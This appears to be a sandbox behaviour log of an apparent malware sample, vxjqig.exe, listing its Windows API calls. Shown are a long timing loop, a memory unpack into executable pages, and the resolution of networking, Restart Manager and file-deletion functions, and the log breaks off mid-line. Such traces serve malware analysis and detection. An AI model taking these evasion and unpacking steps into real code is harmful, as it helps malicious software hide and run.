# Flog Txt Version 1 # Analyzer Version: 3.1.2 # Analyzer Build Date: Oct 28 2019 11:51:53 # Log Creation Date: 06.01.2020 02:29:13.618 Process: id = "1" image_name = "vxjqig.exe" filename = "c:\\users\\fd1hvy\\desktop\\vxjqig.exe" page_root = "0x10fe000" os_pid = "0xcac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\vxjqig.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xdf4 [0036.528] lstrlenA (lpString="") returned 0 [0036.528] GetCursor () returned 0x10007 [0036.554] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.555] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.555] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.555] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.555] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.555] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.555] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.555] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.555] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.555] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.555] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.555] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.555] GetTickCount () returned 0x1149b57 [0036.555] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.556] GetTickCount () returned 0x1149b57 [0036.556] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.557] GetTickCount () returned 0x1149b57 [0036.557] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.558] GetTickCount () returned 0x1149b57 [0036.558] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.559] GetTickCount () returned 0x1149b57 [0036.559] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.560] GetTickCount () returned 0x1149b57 [0036.560] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.561] GetCursor () returned 0x10007 [0036.561] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.562] GetCursor () returned 0x10007 [0036.562] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.563] GetCursor () returned 0x10007 [0036.563] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.564] GetCursor () returned 0x10007 [0036.564] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.565] GetCursor () returned 0x10007 [0036.565] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.566] GetCursor () returned 0x10007 [0036.566] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.567] GetCursor () returned 0x10007 [0036.567] GetTickCount () returned 0x1149b57 [0036.568] GetCursor () returned 0x10007 [0036.568] GetTickCount () returned 0x1149b57 [0036.568] GetCursor () returned 0x10007 [0036.568] GetTickCount () returned 0x1149b57 [0036.568] GetCursor () returned 0x10007 [0036.568] GetTickCount () returned 0x1149b57 [0036.568] GetCursor () returned 0x10007 [0036.568] GetTickCount () returned 0x1149b57 [0036.568] GetCursor () returned 0x10007 [0036.568] GetTickCount () returned 0x1149b57 [0036.568] GetCursor () returned 0x10007 [0036.568] GetTickCount () returned 0x1149b57 [0036.568] GetCursor () returned 0x10007 [0036.568] GetTickCount () returned 0x1149b57 [0036.568] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.569] GetTickCount () returned 0x1149b66 [0036.569] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.570] GetTickCount () returned 0x1149b66 [0036.570] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.571] GetTickCount () returned 0x1149b66 [0036.571] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.572] GetTickCount () returned 0x1149b66 [0036.572] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.573] GetTickCount () returned 0x1149b66 [0036.573] GetCursor () returned 0x10007 [0036.574] GetTickCount () returned 0x1149b66 [0036.574] GetCursor () returned 0x10007 [0036.574] GetTickCount () returned 0x1149b66 [0036.574] GetCursor () returned 0x10007 [0036.574] GetTickCount () returned 0x1149b66 [0036.574] GetCursor () returned 0x10007 [0036.574] GetTickCount () returned 0x1149b66 [0036.574] GetCursor () returned 0x10007 [0036.574] GetTickCount () returned 0x1149b66 [0036.574] GetCursor () returned 0x10007 [0036.574] GetTickCount () returned 0x1149b66 [0036.574] GetCursor () returned 0x10007 [0036.574] GetTickCount () returned 0x1149b66 [0036.908] LocalAlloc (uFlags=0x0, uBytes=0x3e31) returned 0x5f5e40 [0036.922] lstrcatW (in: lpString1="", lpString2="kernel32.dll" | out: lpString1="kernel32.dll") returned="kernel32.dll" [0036.922] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75e90000 [0036.922] GetProcAddress (hModule=0x75e90000, lpProcName="VirtualProtect") returned 0x75ea6a30 [0036.922] VirtualProtect (in: lpAddress=0x5f5e40, dwSize=0x3e31, flNewProtect=0x40, lpflOldProtect=0x19f2b0 | out: lpflOldProtect=0x19f2b0*=0x4) returned 1 [0036.939] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75e90000 [0036.940] GetProcAddress (hModule=0x75e90000, lpProcName="GlobalAlloc") returned 0x75ea5750 [0036.940] GetProcAddress (hModule=0x75e90000, lpProcName="GetLastError") returned 0x75ea5010 [0036.940] GetProcAddress (hModule=0x75e90000, lpProcName="Sleep") returned 0x75ea6760 [0036.940] GetProcAddress (hModule=0x75e90000, lpProcName="VirtualAlloc") returned 0x75ea6970 [0036.940] GetProcAddress (hModule=0x75e90000, lpProcName="CreateToolhelp32Snapshot") returned 0x75ededc0 [0036.940] GetProcAddress (hModule=0x75e90000, lpProcName="Module32First") returned 0x75edfc90 [0036.940] GetProcAddress (hModule=0x75e90000, lpProcName="CloseHandle") returned 0x75efeab0 [0036.940] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0xf0 [0036.943] Module32First (hSnapshot=0xf0, lpme=0x19f0bc) returned 1 [0036.943] VirtualAlloc (lpAddress=0x0, dwSize=0x6450, flAllocationType=0x1000, flProtect=0x40) returned 0x460000 [0036.945] GetProcAddress (hModule=0x75e90000, lpProcName="LoadLibraryA") returned 0x75ea5a80 [0036.945] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75e90000 [0036.945] GetProcAddress (hModule=0x75e90000, lpProcName="VirtualAlloc") returned 0x75ea6970 [0036.945] GetProcAddress (hModule=0x75e90000, lpProcName="VirtualProtect") returned 0x75ea6a30 [0036.945] GetProcAddress (hModule=0x75e90000, lpProcName="VirtualFree") returned 0x75ea69d0 [0036.945] GetProcAddress (hModule=0x75e90000, lpProcName="GetVersionExA") returned 0x75ea56d0 [0036.945] GetProcAddress (hModule=0x75e90000, lpProcName="TerminateProcess") returned 0x75ea67e0 [0036.945] GetProcAddress (hModule=0x75e90000, lpProcName="ExitProcess") returned 0x75ea3cb0 [0036.945] GetProcAddress (hModule=0x75e90000, lpProcName="SetErrorMode") returned 0x75ea6500 [0036.945] SetErrorMode (uMode=0x400) returned 0x0 [0036.946] SetErrorMode (uMode=0x0) returned 0x400 [0036.946] GetVersionExA (in: lpVersionInformation=0x19dfec*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x5ea800, dwMinorVersion=0x5eac70, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="\x07") | out: lpVersionInformation=0x19dfec*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0036.946] VirtualAlloc (lpAddress=0x0, dwSize=0x5600, flAllocationType=0x1000, flProtect=0x4) returned 0x470000 [0036.946] VirtualProtect (in: lpAddress=0x400000, dwSize=0xb000, flNewProtect=0x40, lpflOldProtect=0x19f074 | out: lpflOldProtect=0x19f074*=0x2) returned 1 [0037.183] VirtualFree (lpAddress=0x470000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.183] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75f60000 [0040.072] GetProcAddress (hModule=0x75f60000, lpProcName="PathRemoveFileSpecW") returned 0x75f74500 [0040.073] GetProcAddress (hModule=0x75f60000, lpProcName="StrStrIW") returned 0x75f74390 [0040.073] GetProcAddress (hModule=0x75f60000, lpProcName="StrCmpNA") returned 0x75f7ca10 [0040.073] GetProcAddress (hModule=0x75f60000, lpProcName="wnsprintfW") returned 0x75f84e90 [0040.073] GetProcAddress (hModule=0x75f60000, lpProcName="StrCmpNW") returned 0x75f72800 [0040.073] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x74250000 [0040.521] GetProcAddress (hModule=0x74250000, lpProcName="InternetCrackUrlW") returned 0x743acfa0 [0040.521] GetProcAddress (hModule=0x74250000, lpProcName="InternetQueryDataAvailable") returned 0x7437ec50 [0040.522] GetProcAddress (hModule=0x74250000, lpProcName="InternetOpenW") returned 0x7436e9e0 [0040.522] GetProcAddress (hModule=0x74250000, lpProcName="InternetReadFile") returned 0x74383a70 [0040.522] GetProcAddress (hModule=0x74250000, lpProcName="InternetConnectW") returned 0x7435e000 [0040.522] GetProcAddress (hModule=0x74250000, lpProcName="HttpOpenRequestW") returned 0x743cbdd0 [0040.522] GetProcAddress (hModule=0x74250000, lpProcName="InternetCloseHandle") returned 0x7435d000 [0040.522] GetProcAddress (hModule=0x74250000, lpProcName="HttpSendRequestW") returned 0x74379490 [0040.522] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x74710000 [0040.522] GetProcAddress (hModule=0x74710000, lpProcName="RpcStringFreeW") returned 0x74745830 [0040.522] GetProcAddress (hModule=0x74710000, lpProcName="UuidToStringW") returned 0x7474c200 [0040.522] GetProcAddress (hModule=0x74710000, lpProcName="UuidCreate") returned 0x7474e8b0 [0040.522] LoadLibraryA (lpLibFileName="RstrtMgr.DLL") returned 0x74220000 [0042.651] GetProcAddress (hModule=0x74220000, lpProcName="RmRegisterResources") returned 0x74227660 [0042.652] GetProcAddress (hModule=0x74220000, lpProcName="RmGetList") returned 0x742274f0 [0042.652] GetProcAddress (hModule=0x74220000, lpProcName="RmEndSession") returned 0x74227420 [0042.652] GetProcAddress (hModule=0x74220000, lpProcName="RmStartSession") returned 0x74227930 [0042.652] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75e90000 [0042.652] GetProcAddress (hModule=0x75e90000, lpProcName="ExpandEnvironmentStringsW") returned 0x75ea4a40 [0042.652] GetProcAddress (hModule=0x75e90000, lpProcName="CreateThread") returned 0x75ea46b0 [0042.652] GetProcAddress (hModule=0x75e90000, lpProcName="lstrcpyW") returned 0x75ee7140 [0042.652] GetProcAddress (hModule=0x75e90000, lpProcName="GetCurrentProcessId") returned 0x75efea20 [0042.652] GetProcAddress (hModule=0x75e90000, lpProcName="DeleteFileW") returned 0x75efed40 [0042.652] GetProcAddress (hModule=0x75e90000, lpProcName="GetWindowsDirectoryW") returned 0x75ea5730 [0042.652] GetProcAddress (hModule=0x75e90000, lpProcName="CloseHandle") returned 0x75efeab0 [0042.653] GetProcAddress (hModule=0x75e90000, lpProcName="DeleteCriticalSection") returned 0x77bdfb90 [0042.653] GetProcAddress (hModule=0x75e90000, lpProcName="CreateToolhelp32Snapshot") returned 0x75ededc0 [0042.653] GetProcAddress (hModule=0x75e90000, lpProcName="FindNextFileW") returned 0x75efee40 [0042.653] GetProcAddress (hModule=0x75e90000, lpProcName="lstrcatW") returned 0x75ee71a0 [0042.653] GetProcAddress (hModule=0x75e90000, lpProcName="lstrcmpiW") returned 0x75ea6bf0 [0042.653] GetProcAddress (hModule=0x75e90000, lpProcName="Process32NextW") returned 